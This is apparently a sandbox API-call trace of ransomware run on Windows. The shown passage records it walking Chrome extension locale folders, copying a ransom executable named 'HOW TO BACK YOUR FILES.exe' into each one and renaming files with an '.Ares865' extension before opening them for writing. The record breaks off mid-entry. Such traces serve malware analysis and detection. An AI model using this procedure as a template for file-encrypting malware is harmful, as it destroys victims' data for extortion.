[0103.243] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0103.243] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\th\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\th\\how to back your files.exe"), bFailIfExists=1) returned 0 [0103.244] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0103.244] GetLastError () returned 0x0 [0103.245] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0103.245] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\th\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x866dc5f0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4eed31c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4eed31c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0103.245] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0103.245] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0103.245] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\th\\messages.json.Ares865") returned 160 [0103.245] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\th\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\th\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\th\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\th\\messages.json.ares865"), dwFlags=0x1) returned 1 [0103.246] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\th\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\th\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0103.247] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=254) returned 1 [0103.250] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sv", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sv") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sv" [0103.250] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sv" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sv") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sv" [0103.250] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0103.250] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sv\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sv\\how to back your files.exe"), bFailIfExists=1) returned 0 [0103.251] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0103.251] GetLastError () returned 0x0 [0103.251] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0103.251] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sv\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x866dc5f0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4eef9320, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4eef9320, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0103.251] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0103.251] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0103.251] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sv\\messages.json.Ares865") returned 160 [0103.252] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sv\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sv\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sv\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sv\\messages.json.ares865"), dwFlags=0x1) returned 1 [0103.253] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sv\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sv\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0103.253] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=214) returned 1 [0103.257] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sr", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sr") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sr" [0103.257] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sr" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sr") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sr" [0103.257] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0103.257] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sr\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sr\\how to back your files.exe"), bFailIfExists=1) returned 0 [0103.257] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0103.258] GetLastError () returned 0x0 [0103.258] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0103.258] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sr\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x866dc5f0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4eef9320, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4eef9320, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0103.258] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0103.258] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0103.258] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sr\\messages.json.Ares865") returned 160 [0103.258] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sr\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sr\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sr\\messages.json.ares865"), dwFlags=0x1) returned 1 [0103.260] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sr\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sr\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0103.260] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=248) returned 1 [0103.263] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sl", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sl") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sl" [0103.263] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sl" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sl") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sl" [0103.263] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0103.263] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sl\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sl\\how to back your files.exe"), bFailIfExists=1) returned 0 [0103.264] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0103.264] GetLastError () returned 0x0 [0103.264] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0103.264] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sl\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x866b6490, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4eef9320, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4eef9320, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0103.265] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0103.265] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0103.265] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sl\\messages.json.Ares865") returned 160 [0103.265] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sl\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sl\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sl\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sl\\messages.json.ares865"), dwFlags=0x1) returned 1 [0103.266] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sl\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sl\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0103.267] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=218) returned 1 [0103.269] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sk", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sk") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sk" [0103.270] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sk" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sk") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sk" [0103.270] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0103.270] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sk\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sk\\how to back your files.exe"), bFailIfExists=1) returned 0 [0103.270] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0103.271] GetLastError () returned 0x0 [0103.271] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0103.271] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sk\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x866b6490, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4eef9320, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4eef9320, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0103.271] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0103.271] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0103.271] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sk\\messages.json.Ares865") returned 160 [0103.271] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sk\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sk\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sk\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sk\\messages.json.ares865"), dwFlags=0x1) returned 1 [0103.273] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sk\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sk\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0103.273] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=221) returned 1 [0103.276] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ru", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ru") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ru" [0103.276] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ru" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ru") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ru" [0103.276] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0103.276] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ru\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ru\\how to back your files.exe"), bFailIfExists=1) returned 0 [0103.277] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0103.277] GetLastError () returned 0x0 [0103.278] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0103.278] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ru\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x86690330, 